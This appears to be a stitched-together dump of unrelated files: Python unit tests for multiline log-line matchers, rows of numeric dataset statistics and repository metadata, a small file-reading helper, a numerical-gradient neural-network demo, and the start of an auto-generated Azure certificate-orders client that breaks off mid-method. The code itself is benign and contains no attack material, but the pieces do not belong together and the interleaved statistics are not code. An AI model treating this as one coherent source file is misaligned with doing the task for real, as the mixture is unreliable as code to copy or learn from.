matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_next + expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected + expected_next, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_partial_multiline_match( self ):
expected = "--begin\ncontinuation of a multiline line\nstill continuing\n"
expected_last = "--begin\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
line = append_string( line, expected_last )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( expected_last, actual )
def test_no_match( self ):
line1 = "single line\n"
line2 = "another single line\n"
line = make_string( line1 + line2 )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( '', actual )
actual = line.readline()
self.assertEqual( line1, actual )
def test_timeout_after_matching_start( self ):
expected = "--begin\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_timeout_after_matching_continue( self ):
expected = "--begin\nMultiline\n"
line = make_string( expected )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, line_completion_wait_time = 5 )
current_time = time.time()
actual = matcher.readline( line, current_time - 6 )
self.assertEqual( '', actual )
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( '', actual )
def test_too_long_matching_start( self ):
expected = "--begin"
line = make_string( expected + " multiline\n" )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 7 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( " multiline\n", actual )
def test_too_long_after_matching_continue( self ):
expected = "--begin\nmultiline\nthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 28 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
def test_too_long_after_matching_partial_halt( self ):
expected = "--begin\nmultiline\nmulti\n--beginthis line "
remainder = "will be cut\n"
line = make_string( expected + remainder )
matcher = HaltBefore( self.start_pattern, self.continuation_pattern, max_line_length = 41 )
current_time = time.time()
actual = matcher.readline( line, current_time )
self.assertEqual( expected, actual )
actual = line.readline()
self.assertEqual( remainder, actual )
class HaltWithTestCase(unittest.TestCase):
    """Tests for HaltWith: a matcher that groups lines from a start-pattern
    match up to and including the line matching the end pattern."""

    def setUp(self):
        self.start_pattern = r"^--begin"
        self.continuation_pattern = r"^--end"

    def _make(self, **kwargs):
        # Shared pattern pair; kwargs forward extras such as
        # max_line_length or line_completion_wait_time.
        return HaltWith(self.start_pattern, self.continuation_pattern, **kwargs)

    def test_halt_before(self):
        """A multiline record includes its terminating --end line."""
        want = "--begin\nThis is a multiline message\nThat will end when the\nnext one starts\n--end\n"
        want_next = "next line\n"
        stream = make_string(want + want_next)
        m = self._make()
        now = time.time()
        self.assertEqual(want, m.readline(stream, now))
        self.assertEqual('', m.readline(stream, now))
        # The line after the terminator stays in the stream.
        self.assertEqual(want_next, stream.readline())

    def test_first_line_match_second_line_no_match(self):
        """Start immediately followed by end is emitted as one record."""
        want = "--begin\n"
        want_next = "--end\n"
        stream = make_string(want + want_next)
        m = self._make()
        now = time.time()
        self.assertEqual(want + want_next, m.readline(stream, now))
        self.assertEqual('', m.readline(stream, now))

    def test_partial_first_line_match(self):
        """Nothing is emitted until the end marker arrives."""
        want = "--begin\n"
        want_next = "--end\n"
        want_last = "next line\n"
        stream = make_string(want)
        m = self._make()
        now = time.time()
        self.assertEqual('', m.readline(stream, now))
        stream = append_string(stream, want_next + want_last)
        self.assertEqual(want + want_next, m.readline(stream, now))
        self.assertEqual(want_last, stream.readline())

    def test_partial_multiline_match(self):
        """A buffered multiline record is released when --end shows up."""
        want = "--begin\ncontinuation of a multiline line\nstill continuing\n"
        want_end = "--end\n"
        stream = make_string(want)
        m = self._make()
        now = time.time()
        self.assertEqual('', m.readline(stream, now))
        stream = append_string(stream, want_end)
        self.assertEqual(want + want_end, m.readline(stream, now))
        self.assertEqual('', stream.readline())

    def test_no_match(self):
        """Lines that never match the start pattern are not consumed."""
        first = "single line\n"
        second = "another single line\n"
        stream = make_string(first + second)
        m = self._make()
        now = time.time()
        self.assertEqual('', m.readline(stream, now))
        self.assertEqual('', m.readline(stream, now))
        self.assertEqual(first, stream.readline())

    def test_timeout_after_matching_start(self):
        """An unterminated record is flushed after the wait time elapses."""
        want = "--begin\n"
        stream = make_string(want)
        m = self._make(line_completion_wait_time=5)
        now = time.time()
        self.assertEqual('', m.readline(stream, now - 6))
        self.assertEqual(want, m.readline(stream, now))
        self.assertEqual('', stream.readline())

    def test_timeout_after_matching_continue(self):
        """The timeout flush also covers buffered continuation lines."""
        want = "--begin\nMultiline\n"
        stream = make_string(want)
        m = self._make(line_completion_wait_time=5)
        now = time.time()
        self.assertEqual('', m.readline(stream, now - 6))
        self.assertEqual(want, m.readline(stream, now))
        self.assertEqual('', stream.readline())

    def test_too_long_matching_start(self):
        """The start line itself is truncated at max_line_length."""
        want = "--begin"
        stream = make_string(want + " multiline\n")
        m = self._make(max_line_length=7)
        self.assertEqual(want, m.readline(stream, time.time()))
        self.assertEqual(" multiline\n", stream.readline())

    def test_too_long_after_matching_continue(self):
        """Truncation mid-record leaves the remainder in the stream."""
        want = "--begin\nmultiline\nthis line "
        rest = "will be cut\n"
        stream = make_string(want + rest)
        m = self._make(max_line_length=28)
        self.assertEqual(want, m.readline(stream, time.time()))
        self.assertEqual(rest, stream.readline())
class LineMatcherCollectionTestCase(unittest.TestCase):
    """Tests that a LineMatcherCollection dispatches each input to the
    correct member matcher, falling back to single-line behavior."""

    # -- factories for the individual matchers and matching sample input --

    def continue_through(self, start="^--multi", cont="^--", length=1024, timeout=60):
        """Matcher that keeps consuming while the continuation pattern matches."""
        return ContinueThrough(start, cont, length, timeout)

    def continue_through_string(self):
        return "--multi\n--next\n--last\n"

    def continue_past(self, start=r"\\$", cont=r"\\$", length=1024, timeout=60):
        """Matcher that consumes one line past the last continuation match."""
        return ContinuePast(start, cont, length, timeout)

    def continue_past_string(self):
        return "continue past \\\nand past\\\nand stop\n"

    def halt_before(self, start="^--begin", cont="^--last", length=1024, timeout=60):
        """Matcher that stops just before the halting pattern."""
        return HaltBefore(start, cont, length, timeout)

    def halt_before_string(self):
        return "--begin\nand halt before\nthe next line starting with the start pattern\n"

    def halt_with(self, start="^--start", cont="^--end", length=1024, timeout=60):
        """Matcher that stops on and includes the ending pattern."""
        return HaltWith(start, cont, length, timeout)

    def halt_with_string(self):
        return "--start\nand stop after\nthe next line\n--end\n"

    def single_string(self):
        return "a single line\n"

    def line_matcher_collection(self, length=1024, timeout=60):
        """Build a collection holding one matcher of each flavor."""
        result = LineMatcherCollection(length, timeout)
        for member in (self.continue_through(), self.continue_past(),
                       self.halt_before(), self.halt_with()):
            result.add_matcher(member)
        return result

    # -- one test per matcher flavor, then none-match and all-in-sequence --

    def test_continue_through(self):
        collection = self.line_matcher_collection()
        want = self.continue_through_string()
        stream = make_string(want + self.single_string())
        self.assertEqual(want, collection.readline(stream, time.time()))
        self.assertEqual(self.single_string(), stream.readline())

    def test_continue_past(self):
        collection = self.line_matcher_collection()
        want = self.continue_past_string()
        stream = make_string(want + self.single_string())
        self.assertEqual(want, collection.readline(stream, time.time()))
        self.assertEqual(self.single_string(), stream.readline())

    def test_halt_before(self):
        collection = self.line_matcher_collection()
        want = self.halt_before_string()
        stream = make_string(want + "--last\n")
        self.assertEqual(want, collection.readline(stream, time.time()))
        # The halting line is left unconsumed.
        self.assertEqual("--last\n", stream.readline())

    def test_halt_with(self):
        collection = self.line_matcher_collection()
        want = self.halt_with_string()
        stream = make_string(want + self.single_string())
        self.assertEqual(want, collection.readline(stream, time.time()))
        self.assertEqual(self.single_string(), stream.readline())

    def test_none(self):
        # No matcher claims the line, so it is returned as a plain line.
        collection = self.line_matcher_collection()
        want = self.single_string()
        stream = make_string(want)
        self.assertEqual(want, collection.readline(stream, time.time()))
        self.assertEqual('', stream.readline())

    def test_all(self):
        """Mixed input: each record is routed to the matching flavor in turn."""
        collection = self.line_matcher_collection()
        end_marker = "--last\n"
        pieces = [
            self.single_string(),
            self.halt_with_string(),
            self.halt_before_string(),
            end_marker,
            self.continue_past_string(),
            self.continue_through_string(),
            self.single_string(),
        ]
        stream = make_string("".join(pieces))
        now = time.time()
        for piece in pieces:
            self.assertEqual(piece, collection.readline(stream, now))
        self.assertEqual('', stream.readline())
| 35.312869
| 192
| 0.645503
| 3,312
| 29,910
| 5.634058
| 0.061896
| 0.100482
| 0.085531
| 0.111468
| 0.884191
| 0.864041
| 0.841479
| 0.830171
| 0.817203
| 0.782476
| 0
| 0.005274
| 0.252023
| 29,910
| 846
| 193
| 35.35461
| 0.828804
| 0.022033
| 0
| 0.79357
| 0
| 0.006768
| 0.076726
| 0.019258
| 0
| 0
| 0
| 0
| 0.211506
| 1
| 0.106599
| false
| 0
| 0.01692
| 0.015228
| 0.153976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7b7b2c495dadd1dece51ea84b905a23f0d499d2
| 127
|
py
|
Python
|
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
] | null | null | null |
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
] | null | null | null |
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
] | null | null | null |
import gybc
import os
def texts():
    """Return all lines of the bundled archive file as a list of strings.

    The file is located at ``bin/archive.txt`` relative to
    ``gybc.GYBC_PATH`` (two directories up from that path).

    :returns: list of lines, each retaining its trailing newline.
    :raises OSError: if the archive file cannot be opened.
    """
    archive_path = os.path.join(gybc.GYBC_PATH, '..', '..', 'bin', 'archive.txt')
    # Bug fix: the original opened the file without ever closing it,
    # leaking the handle until garbage collection. A context manager
    # guarantees prompt closure.
    with open(archive_path) as archive_file:
        return archive_file.readlines()
| 25.4
| 91
| 0.637795
| 18
| 127
| 4.444444
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125984
| 127
| 5
| 91
| 25.4
| 0.720721
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d7d68a4bd950b7a546c95f189fb301d4a126b969
| 1,362
|
py
|
Python
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-08-04T02:59:58.000Z
|
2020-08-04T02:59:58.000Z
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-01-30T01:38:58.000Z
|
2020-01-30T01:38:58.000Z
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-01-30T01:34:25.000Z
|
2020-01-30T01:34:25.000Z
|
# Bug fix: this file contained an unresolved git merge conflict
# (<<<<<<< HEAD / ======= / >>>>>>> markers), which is a SyntaxError.
# Both sides of the conflict were identical, so a single clean copy is kept.
import sys, os

sys.path.append(os.pardir)

import numpy as np

from common.functions import softmax, cross_entropy_error
from common.gradient import numerical_gradient


class simple_Net:
    """Minimal one-layer network used to demonstrate numerical gradients."""

    def __init__(self):
        # NOTE(review): np.random.rand samples a *uniform* [0, 1) distribution,
        # not the normal distribution the original (Korean) comment claimed;
        # np.random.randn would give N(0, 1) — confirm intent before changing.
        self.W = np.random.rand(2, 3)

    def predict(self, x):
        """Return the raw scores (x @ W) for input vector x."""
        return np.dot(x, self.W)

    def loss(self, x, t):
        """Cross-entropy loss of the softmax of the scores against target t."""
        z = self.predict(x)
        y = softmax(z)
        loss = cross_entropy_error(y, t)
        return loss


# Demo: build a net, predict on a sample, and take a numerical gradient.
net = simple_Net()
print(net.W)

x = np.array([0.6, 0.9])
p = net.predict(x)
print(p)
np.argmax(p)

t = np.array([0, 0, 1])
net.loss(x, t)

# The gradient function ignores its argument; it closes over (x, t)
# so numerical_gradient can perturb net.W in place.
f = lambda w: net.loss(x, t)
dw = numerical_gradient(f, net.W)
| 18.916667
| 56
| 0.651982
| 234
| 1,362
| 3.692308
| 0.222222
| 0.013889
| 0.078704
| 0.041667
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0
| 0.042009
| 0.196035
| 1,362
| 71
| 57
| 19.183099
| 0.747032
| 0.01395
| 0
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.150943
| null | null | 0.075472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d7dba90cd71205ebd9d8f1b4de1f07ed37df7f43
| 68
|
py
|
Python
|
users/app/models/__init__.py
|
Kludex/fastapi-microservices
|
4a89b254ed7ae023c2e3bf6421c9f5a0bc9e4408
|
[
"MIT"
] | 84
|
2021-04-19T07:11:23.000Z
|
2022-03-31T11:48:46.000Z
|
users/app/models/__init__.py
|
Bastien-BO/fastapi-microservices
|
ab8e2aaa999c22a4a2bb9b0a1e4796a3ed186fd8
|
[
"MIT"
] | 31
|
2021-04-19T20:29:56.000Z
|
2021-11-27T19:55:31.000Z
|
users/app/models/__init__.py
|
Bastien-BO/fastapi-microservices
|
ab8e2aaa999c22a4a2bb9b0a1e4796a3ed186fd8
|
[
"MIT"
] | 11
|
2021-05-18T15:28:15.000Z
|
2022-03-22T14:10:03.000Z
|
from app.models.items import Item
from app.models.users import User
| 22.666667
| 33
| 0.823529
| 12
| 68
| 4.666667
| 0.666667
| 0.25
| 0.464286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0be597bd2500ec808e9d4531a6ad0caf82d0a41b
| 51,467
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | 1
|
2017-10-29T15:14:35.000Z
|
2017-10-29T15:14:35.000Z
|
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class CertificateOrdersOperations(object):
"""CertificateOrdersOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_certificate(
        self, resource_group_name, certificate_order_name, name, custom_headers=None, raw=False, **operation_config):
    """Get certificate associated with the certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param certificate_order_name: Certificate name
    :type certificate_order_name: str
    :param name: Certificate name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrderCertificate
     <azure.mgmt.web.models.CertificateOrderCertificate>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # NOTE: AutoRest-generated method; hand edits will be lost on regeneration.
    # Construct URL — each path segment is serialized/escaped before substitution.
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Unique id so the service can correlate this call in diagnostics.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers override the generated defaults.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request (GET, no body)
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        # Any non-200 status surfaces as CloudError, tagged with the
        # service-side request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrderCertificate', response)

    if raw:
        # Caller asked for the transport-level response alongside the model.
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update_certificate(
        self, resource_group_name, certificate_order_name, name, key_vault_certificate, custom_headers=None, raw=False, **operation_config):
    """Associates a Key Vault secret to a certificate store that will be used
    for storing the certificate once it's ready.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param certificate_order_name: Certificate name
    :type certificate_order_name: str
    :param name: Certificate name
    :type name: str
    :param key_vault_certificate: Key Vault secret csm Id
    :type key_vault_certificate: :class:`CertificateOrderCertificate
     <azure.mgmt.web.models.CertificateOrderCertificate>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrderCertificate
     <azure.mgmt.web.models.CertificateOrderCertificate>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # NOTE: AutoRest-generated method; hand edits will be lost on regeneration.
    # Construct URL — path segments are serialized/escaped before substitution.
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Unique id so the service can correlate this call in diagnostics.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers override the generated defaults.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body — the model is serialized to the wire format.
    body_content = self._serialize.body(key_vault_certificate, 'CertificateOrderCertificate')

    # Construct and send request (PUT with JSON body)
    request = self._client.put(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)

    if response.status_code not in [200]:
        # Any non-200 status surfaces as CloudError, tagged with the
        # service-side request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrderCertificate', response)

    if raw:
        # Caller asked for the transport-level response alongside the model.
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def delete_certificate(
        self, resource_group_name, certificate_order_name, name, custom_headers=None, raw=False, **operation_config):
    """Deletes the certificate associated with the certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param certificate_order_name: Certificate name
    :type certificate_order_name: str
    :param name: Certificate name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # NOTE: AutoRest-generated method; hand edits will be lost on regeneration.
    # Construct URL — path segments are serialized/escaped before substitution.
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Unique id so the service can correlate this call in diagnostics.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers override the generated defaults.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request (DELETE, no body)
    request = self._client.delete(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        # Any non-200 status surfaces as CloudError, tagged with the
        # service-side request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        # The service returns an untyped payload for deletes.
        deserialized = self._deserialize('object', response)

    if raw:
        # Caller asked for the transport-level response alongside the result.
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def update_certificate(
        self, resource_group_name, certificate_order_name, name, key_vault_certificate, custom_headers=None, raw=False, **operation_config):
    """Associates a Key Vault secret to a certificate store that will be used
    for storing the certificate once it's ready.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param certificate_order_name: Certificate name
    :type certificate_order_name: str
    :param name: Certificate name
    :type name: str
    :param key_vault_certificate: Key Vault secret csm Id
    :type key_vault_certificate: :class:`CertificateOrderCertificate
     <azure.mgmt.web.models.CertificateOrderCertificate>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrderCertificate
     <azure.mgmt.web.models.CertificateOrderCertificate>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # NOTE: AutoRest-generated method; hand edits will be lost on regeneration.
    # Same as create_or_update_certificate, but issued as a PATCH.
    # Construct URL — path segments are serialized/escaped before substitution.
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Unique id so the service can correlate this call in diagnostics.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers override the generated defaults.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body — the model is serialized to the wire format.
    body_content = self._serialize.body(key_vault_certificate, 'CertificateOrderCertificate')

    # Construct and send request (PATCH with JSON body)
    request = self._client.patch(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)

    if response.status_code not in [200]:
        # Any non-200 status surfaces as CloudError, tagged with the
        # service-side request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrderCertificate', response)

    if raw:
        # Caller asked for the transport-level response alongside the model.
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def get_certificate_order(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get a certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrder
     <azure.mgmt.web.models.CertificateOrder>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # NOTE: AutoRest-generated method; hand edits will be lost on regeneration.
    # Construct URL — the order-level resource has no certificate segment.
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Unique id so the service can correlate this call in diagnostics.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        # Caller-supplied headers override the generated defaults.
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
